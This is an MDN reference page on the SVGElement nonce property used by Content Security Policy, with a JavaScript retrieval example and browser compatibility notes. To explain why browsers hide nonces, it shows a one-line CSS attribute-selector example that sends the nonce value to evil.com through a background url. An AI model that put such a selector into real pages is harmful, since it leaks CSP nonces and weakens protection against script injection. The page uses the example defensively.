SVGElement: nonce property

Baseline Widely available

This feature is well established and works across many devices and browser versions. It’s been available across browsers since ⁨March 2022⁩.

The nonce property of the SVGElement interface returns the nonce that is used by Content Security Policy to determine whether a given fetch will be allowed to proceed.

Value

A String; the cryptographic nonce, or an empty string if no nonce is set.

Examples

Retrieving a nonce value

In the past, not all browsers supported the nonce IDL attribute, so a workaround is to try to use getAttribute as a fallback:

const svg = document.querySelector("svg");
const nonce = svg.nonce || svg.getAttribute("nonce");

// Modern browsers hide the nonce attribute from getAttribute()
console.log(nonce); // Prefer using `svg.nonce`

However, recent browsers version hide nonce values that are accessed this way (an empty string will be returned). The IDL property (svg['nonce']) will be the only way to access nonces.

Nonce hiding helps prevent attackers from exfiltrating nonce data via mechanisms that can grab data from content attributes like this CSS selector:

css

svg[nonce~="whatever"] {
  background: url("https://evil.com/nonce?whatever");
}

Specifications

Specification
HTML # dom-noncedelement-nonce

Browser compatibility

Help improve MDN

Learn how to contribute

This page was last modified on ⁨Apr 10, 2025⁩ by MDN contributors.

View this page on GitHub • Report a problem with this content